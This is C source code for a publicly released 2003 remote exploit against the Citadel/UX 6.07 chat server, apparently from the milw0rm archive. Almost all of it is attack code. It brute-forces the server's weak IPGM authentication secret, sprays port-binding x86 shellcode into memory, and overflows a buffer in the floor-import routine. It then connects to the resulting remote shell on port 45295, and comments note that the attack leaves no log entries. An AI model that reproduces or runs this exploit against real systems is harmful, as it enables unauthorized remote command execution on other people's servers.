/*
Citadel/UX 6.07 Remote exploit
By Carl Livitt, July 2003
*/
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <netdb.h>
#include <time.h>
#include <stdarg.h>
// If you change these, things will probably break.
#define SIZ 4096
#define LEN 298
#define RET 0xbfffaf20
#define CITADEL_PORT 504
#define SHELL_PORT 45295
#define LOCAL_NET() if(localNet) {my_sleep(nanoSecondsToSleep);}
#define CHANCE_COUNTER 5
#define NODELAY_ERR -1
#define SOCKET_ERR -2
#define CONNECT_ERR -3
#define HOST_NOT_RESOLVED -4
#define BRUTE_FORCE_EXHAUSTED -5
#define INCORRECT_IPGM_SECRET -6
#define SHELL_NOT_FOUND -7
#define SUCCESS 1
#define FAILED 0
// I'm using prewritten shellcode today... Laziness, Impatience, Hubris!
// --------
// linux x86 shellcode by eSDee of Netric (www.netric.org)
// 200 byte - forking portbind shellcode - port=0xb0ef(45295)
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
"\x06\x51\xb1\x01\x51\xb1\x02\x51"
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
"\x89\xc1\x31\xc0\x31\xdb\x50\x50"
"\x50\x66\x68\xb0\xef\xb3\x02\x66"
"\x53\x89\xe2\xb3\x10\x53\xb3\x02"
"\x52\x51\x89\xca\x89\xe1\xb0\x66"
"\xcd\x80\x31\xdb\x39\xc3\x74\x05"
"\x31\xc0\x40\xcd\x80\x31\xc0\x50"
"\x52\x89\xe1\xb3\x04\xb0\x66\xcd"
"\x80\x89\xd7\x31\xc0\x31\xdb\x31"
"\xc9\xb3\x11\xb1\x01\xb0\x30\xcd"
"\x80\x31\xc0\x31\xdb\x50\x50\x57"
"\x89\xe1\xb3\x05\xb0\x66\xcd\x80"
"\x89\xc6\x31\xc0\x31\xdb\xb0\x02"
"\xcd\x80\x39\xc3\x75\x40\x31\xc0"
"\x89\xfb\xb0\x06\xcd\x80\x31\xc0"
"\x31\xc9\x89\xf3\xb0\x3f\xcd\x80"
"\x31\xc0\x41\xb0\x3f\xcd\x80\x31"
"\xc0\x41\xb0\x3f\xcd\x80\x31\xc0"
"\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x8b\x54\x24"
"\x08\x50\x53\x89\xe1\xb0\x0b\xcd"
"\x80\x31\xc0\x40\xcd\x80\x31\xc0"
"\x89\xf3\xb0\x06\xcd\x80\xeb\x99";
// These kind of appeared as the exploit was developed
void my_send(int, char *, ...);
void my_recv(int);
void make_shellcode(char *);
void make_exploitbuf(char *);
int brute_force(int);
void usage(void);
void my_sleep(int);
void increase_chances(int,int);
int connect_to_host(char *, int);
int attempt_exploit(void);
// As did these... all global, as they kepy moving
// between functions and I grew sick of it...
int localNet=0, bufLenAdjust=0;
int nanoSecondsToSleep=100000;
int SEED_START=10;
int SEED_MAX=30000;
int NUM_ATTEMPTS=4;
int RESPAWN_SLEEP=10;
int seed;
struct timespec t;
unsigned long retAddr=RET;
char buf[SIZ], host[SIZ];
int magicNumber=0,sock,adjustRet=0,ch,retVal,i,r;
fd_set rfds;
main(int argc, char **argv) {
int exploitAttempts=0;
// parse command-line
while((ch=getopt(argc, argv, "t:li:s:hr:a:A:o:O:b:B:n:S:"))!=-1) {
switch(ch) {
case 't':
strncpy(host, optarg, SIZ-1);
break;
case 'i':
magicNumber=atoi(optarg);
printf("[-] Using IPGM secret: %d\n", magicNumber);
break;
case 'l':
localNet=1;
printf("[-] Using local net hack\n");
break;
case 's':
nanoSecondsToSleep=atoi(optarg);
printf("[-] Using sleep count of %d where necessary\n", nanoSecondsToSleep);
break;
case 'r':
retAddr=strtoul(optarg,NULL,16);
printf("[-] Using RET address: 0x%08x\n", retAddr);
break;
case 'a':
adjustRet=atoi(optarg);
retAddr+=adjustRet;
printf("[-] Using RET address: 0x%08x\n", retAddr);
break;
case 'A':
adjustRet=atoi(optarg);
retAddr-=adjustRet;
printf("[-] Using RET address: 0x%08x\n", retAddr);
break;
case 'o':
bufLenAdjust=atoi(optarg);
printf("[-] Increasing overflow buffer by %d bytes\n", bufLenAdjust);
break;
case 'O':
bufLenAdjust=atoi(optarg);
bufLenAdjust=-bufLenAdjust;
printf("[-] Decreasing overflow buffer by %d bytes\n", bufLenAdjust);
break;
case 'b':
SEED_START=atoi(optarg);
printf("[-] Bruteforce starting at srand(%d)\n", SEED_START);
break;
case 'B':
SEED_MAX=atoi(optarg);
printf("[-] Bruteforce ending at srand(%d)\n", SEED_MAX);
break;
case 'n':
NUM_ATTEMPTS=atoi(optarg);
printf("[-] Will try exploit %d times\n", NUM_ATTEMPTS);
break;
case 'S':
RESPAWN_SLEEP=atoi(optarg);
printf("[-] Will sleep for %d seconds between exploit attempts\n");
break;
case 'h':
default:
usage();
exit(0);
}
}
while(exploitAttempts++ < NUM_ATTEMPTS && (retVal=attempt_exploit())!=SUCCESS) {
switch(retVal) {
case HOST_NOT_RESOLVED:
printf("[*] Couldn't connect to host: %s not found.\n", host);
exit(1);
break;
case SOCKET_ERR:
printf("[*] Couldn't grab a socket!\n");
exit(1);
break;
case CONNECT_ERR:
printf("[*] Connection to %s was rejected\n",host);
exit(1);
case NODELAY_ERR:
printf("[!] WARNING: Failed to set TCP_NODELAY option on socket\n");
break;
case BRUTE_FORCE_EXHAUSTED:
printf("[*] Brute force operation failed. Aborting.\n");
exit(1);
break;
case INCORRECT_IPGM_SECRET:
printf("[*] IPGM secret incorrect!\n");
exit(1);
break;
case SHELL_NOT_FOUND:
printf("[!] This attempt failed... waiting for INIT to respawn Citadel...\n");
sleep(RESPAWN_SLEEP);
break;
default:
printf("[*] ERROR: There was no error!\n");
break;
}
}
if(exploitAttempts==NUM_ATTEMPTS)
printf("[-] Exploit failed %d times. Aborting.\n", exploitAttempts);
printf("\nHave a nice day!\n");
exit(0);
}
int attempt_exploit(void) {
int magic;
// Connect to the host and grab the banner
printf("[-] Connecting to Citadel server (%s) on port %d\n", host, CITADEL_PORT);
if((sock=connect_to_host(host,CITADEL_PORT)) < 1)
return sock;
my_recv(sock);
// Attempt to brute-force the secret IPGM authentication number.
// Only do this if magic number is not given on command-line (-i flag).
magic=magicNumber;
if(!magic) {
printf("[-] Starting bruteforce operation ...\n");fflush(stdout);
if((magic=brute_force(sock))==-1) {
return BRUTE_FORCE_EXHAUSTED;
}
printf("[-] Success! IPGM=%d (seed: %d)\n", magic, seed);
magicNumber=magic; // set magicNumber so we don't run bruteforcer again
// Tear down the socket, and reconnect again (to reauthenticate),
printf("[-] Re-establishing connection to %s ...\n",host);
my_send(sock, "QUIT\n");
my_recv(sock);
close(sock);
if(!(sock=connect_to_host(host,CITADEL_PORT)))
return sock;
}
// Authenticate as internal program, but unlike the brute-force attempts,
// tag 4K of shellcode on the end of the request
printf("[-] Authenticating as internal progam ...\n");
make_shellcode(buf);
my_send(sock, "IPGM %d %s\n", magic, buf);
LOCAL_NET();
buf[recv(sock,buf,SIZ-1,0)]=0; // don't do this at home, kids!
if(strncmp(buf, "200",3)) {
return INCORRECT_IPGM_SECRET;
}
// Increase the chance of the shellcode being in the correct place at the
// correct time by sending it many times... this lets each worker thread
// in Citserver copy the shellcode into a buffer, making it almost
// certain that we can jump to it successfully (it hasn't failed once!)
// Shellcode is stored in a buffer that is used by Citserver to hold
// text that would normally get logged to stderr. As Citserver usually
// runs as a daemon, this exploit doesn't show in any logs at all.
increase_chances(sock,magic);
// Enter configuration import mode, specifically the 'floor' section,
// although I think others may be vulnerable too
printf("[-] Entering config mode ...\n");
my_send(sock, "ARTV import\n");
my_recv(sock);
my_send(sock, "floor\n");
// Start the vulnerable import process which blindly reads in 6 lines of
// data. These lines are read into buffers 4K in size, and the data is
// also truncated at 4K... Unfortunately, the 3rd line goes into a 256
// byte buffer which, of course, overflows..
printf("[-] Sending exploit strings ...\n");
my_send(sock, "a\n");
my_send(sock, "a\n");
// Overflow occurs when this buffer is read by the server, so make sure
// it's padded to the correct size with the evil RET address tagged on
// the end.
make_exploitbuf(buf);
my_send(sock,buf);
// Send the final 3 lines of text. It can be anything we like...
make_shellcode(buf);
for(i=0;i<3;i++)
my_send(sock,buf);
// The server will now have RETurned to the new, malicious saved EIP and
// is executing the shellcode... We close the connection, wait a couple of
// seconds and then connect to the shell which is bound to port 45295.
close(sock);
printf("[-] Waiting before connecting to shell...\n");
sleep(2);
printf("[-] Now connecting to shell...\n");
if(!(sock=connect_to_host(host,SHELL_PORT))) {
return SHELL_NOT_FOUND;
}
printf("[-] Connected! You can type commands now:\n");
// Now let the attacker issue commands to the remote
// shell, just as if (s)he had launched 'nc host 45295'.
do {
FD_ZERO(&rfds);
FD_SET(0, &rfds);
FD_SET(sock, &rfds);
retVal=select(sock+1, &rfds, NULL, NULL, NULL);
if(retVal) {
if(FD_ISSET(sock, &rfds)) {
buf[(r=recv(sock, buf, SIZ-1,0))]='\0'; // bad!
printf("%s", buf);
}
if(FD_ISSET(0, &rfds)) {
buf[(r=read(0, buf, SIZ-1))]='\0'; // bad!
send(sock, buf, strlen(buf), 0);
}
}
} while(retVal && r); // loop until connection terminates
// Be an environmentally friendly programmer and free resources before exiting...
close(sock);
return 1;
}
// Given a hostname (or IP address) and a port number, this function
// connects a TCP stream and returns a socket number (or dies trying)
int connect_to_host(char *h, int p) {
int sock,tmp=1;
struct hostent *host;
struct sockaddr_in saddr;
if((host=gethostbyname(h))==NULL) {
return HOST_NOT_RESOLVED;
}
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1) {
return SOCKET_ERR;
}
memset((void *)&saddr, 0, sizeof(struct sockaddr_in));
saddr.sin_family=AF_INET;
saddr.sin_addr.s_addr=*((unsigned long *)host->h_addr_list[0]);
saddr.sin_port=htons(p);
if(connect(sock, (struct sockaddr *)&saddr, sizeof(saddr))<0) {
return CONNECT_ERR;
}
// We want this to stop bad buffering on fast networks... TCP_NODELAY seems
// to fix strange and intermittent buffering issues on some test boxes,
// especially when coupled with 'local net' mode ( See 'help' in usage() ).
if(setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (void *)&tmp, sizeof(tmp))!=0) {
return NODELAY_ERR;
}
return sock;
}
// This will brute-force the secret IPGM (Internal ProGraM) authentication
// code for the Citadel server. The IPGM secrets are determined at install
// time and use a very weak random number generator that creates precisely
// reproducable 'random' numbers. By default, this brute-forcer is setup to
// try about 29990 32-bit 'secret' numbers... it's overkill but catches 100%
// of Citadel installations tested so far.
// Returns IPGM secret number if successful, -1 if not.
// Note: This could be a lot more efficient... but seeing as this is a public
// release, better not make it _too_ efficient, eh?
int brute_force(int s) {
char buf[SIZ];
int exitFlag=0, randomNum;
// Loop through each seed and try the random number...
seed=SEED_START;
while(!exitFlag && seed<=SEED_MAX) {
printf("[-] Bruteforcing ... %d of %d\r", seed, SEED_MAX);fflush(stdout);
srand(seed);
my_send(s, "IPGM %d\n", (randomNum=rand()));
memset(buf,0,SIZ-1);
LOCAL_NET();
recv(s, buf, SIZ-1, 0);
if(!strncmp(buf, "200",3))
exitFlag=1;
seed++;
}
printf(" \r");
// Return the magic number to the caller if successful.
// Note: we have already been successfully IPGM authenticated,
// so no need to do it again in the calling function.
if(exitFlag)
return randomNum;
else
return -1;
}
// Fairly standard function to fill a buffer with LEN bytes of padding,
// followed by the RET address to overwrite saved EIP with. An extra non-
// printable character is added at the end of the buffer because the Citadel
// server will convert the last non-printable character in a buffer to NULL.
void make_exploitbuf(char *b) {
int l;
memset(b,0x00,SIZ-1);
memset(b,'a',LEN+bufLenAdjust);
l=strlen(b);
b[l]=retAddr&0xff;
b[l+1]=(retAddr&0xff00)>>8;
b[l+2]=(retAddr&0xff0000)>>16;
b[l+3]=(retAddr&0xff000000)>>24;
// make sure there is a non-printable char _after_ the RET address, because the server
// will replace the last non-printable char with a NULL... we don't want our RET NULLified!
strcat(b, "_\x01\n");
}
// Pad out the shellcode buffer with NOPs to make it easier to hit the
// shellcode when the server RETurns from the vulnerable function. Again,
// a non-printable char is added to the end of the buffer.
void make_shellcode(char *b) {
int l;
memset(b,0,SIZ-1);
memset(b,0x90,SIZ-40); // 40 is arbitrary - enough room for IPGM xxxxxxxxxx
memcpy(b+(SIZ-42)-strlen(shellcode), shellcode, strlen(shellcode));
strcat(b,"\x01"); // nonprintable chaar
}
// Handy little function to send formattable data down a socket.
void my_send(int s, char *b, ...) {
va_list ap;
char *buf;
va_start(ap,b);
vasprintf(&buf,b,ap);
send(s,buf,strlen(buf),0);
va_end(ap);
free(buf);
}
// Another handy function to read data from a socket.
void my_recv(int s) {
int len;
char buf[SIZ];
LOCAL_NET();
len=recv(s, buf, SIZ-1, 0);
buf[len]=0;
// do stuff with buf[] here...
//printf("%s");
}
// No prizes for guessing what this does....
// Note: this style of multi-line text strings is deprecated and won't compile
// under GCC 3.3 - I don't care.
void usage(void) {
printf("
Citadel Exploit - Public Release Version
By Carl Livitt (carllivitt at hush dot com)
Flags:
-t target Attack host 'target'
-l Use 'local net' mode: adds small pauses
between send() and recv() calls. Has more
chance of succeding on fast networks
-i number Specify IPGM number if known - avoids
doing brute force discovery
-s nanosecs Sleep for 'nanosecs' when in local net mode
default: 100000
-r address Specify RET address
-a adjustment Add 'adjustment' to RET address
-A adjustment Subtract 'adjustment' to RET address
-o adjustment Add 'adjustment' to overflow buffer length
-O adjustment Subtract 'adjustment' from overflow buffer length
-b number Start bruteforce srand() seed at 'number'
-B number End bruteforce srand() seed at 'number'
-n number Attempt the exploit 'number' times
-S seconds Sleep for 'seconds' between exploit attempts
-h You're reading it.
");
}
// Wrapper for nanosleep()... just pass 'n' nanoseconds to it.
void my_sleep(int n) {
t.tv_sec=0;
t.tv_nsec=n;
nanosleep(&t,&t);
}
// Flood the citadel server CHANCE_COUNTER times with the shellcode
// to try and make it more likely for the shellcode to be in the right
// place at the right time. This function makes one helluva difference
// to the exploits reliability (100% reliable to date).
void increase_chances(int s, int m) {
char buf[SIZ];
int i;
make_shellcode(buf);
for(i=0;i<CHANCE_COUNTER;i++) {
my_send(s, "IPGM %d %s\n", m, buf);
my_recv(s);
}
}
// milw0rm.com [2003-07-17]
